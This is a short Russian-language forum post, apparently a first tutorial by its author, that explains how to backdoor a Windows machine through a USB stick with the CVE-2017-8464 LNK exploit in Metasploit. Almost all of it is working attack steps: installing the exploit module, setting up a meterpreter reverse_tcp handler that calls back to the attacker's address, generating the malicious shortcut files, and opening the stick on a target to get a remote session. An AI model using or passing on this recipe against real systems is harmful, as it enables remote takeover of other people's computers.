Бэкдор Windows с помощью флешки
@webwareЗдраствуйте, в данной статье я опишу способ для создания сесии с помощью флешки
Скачиваем експлоит. (Вот все версии на которых "поддерживается" експлоит)
1. Нужно переименовать скачанный експлоит:
cd /root/Загрузки/ ls mv 42382.rb CVE_2017_8464_LNK_Rce.rb
2. Перемещаем файл:
mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
3. Запускаем Metasploit и перезапускаем модули:
msfconsole msf>reload_all
4. Создадим полезную нагрузку:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.14 set lport 8080 exploit -j back
(192.168.0.14 - это мой локальный адрес, также можна вбивать и обычный Ip, с ним тоже все роботает.)
Не знаю почему, но на порту 4444 у меня иногда выдает ошибку, поэтому я и сменила порт, но вы можете сначала попробовать на стандартном, а если не получиться то попробовать с 8080 портом.
5. Загружаем скачанный нами, недавно, експлоит:
use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce info set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.14 exploit
6. Все файлы которые были созданы нужно переместить на флешку. Открывает папку с файлами,
xdg-open /root/.msf4/local/
, и копируем на любую флешку.
7. Не закрывая консоль, открываем флешку на тестовой машине. Подождем пока мета прогрузит, и проверяем "активацию"
sessions -i
Спасибо за внимание, это был мой перво-пост, и надеюсь не последний, если что-то не так пишите.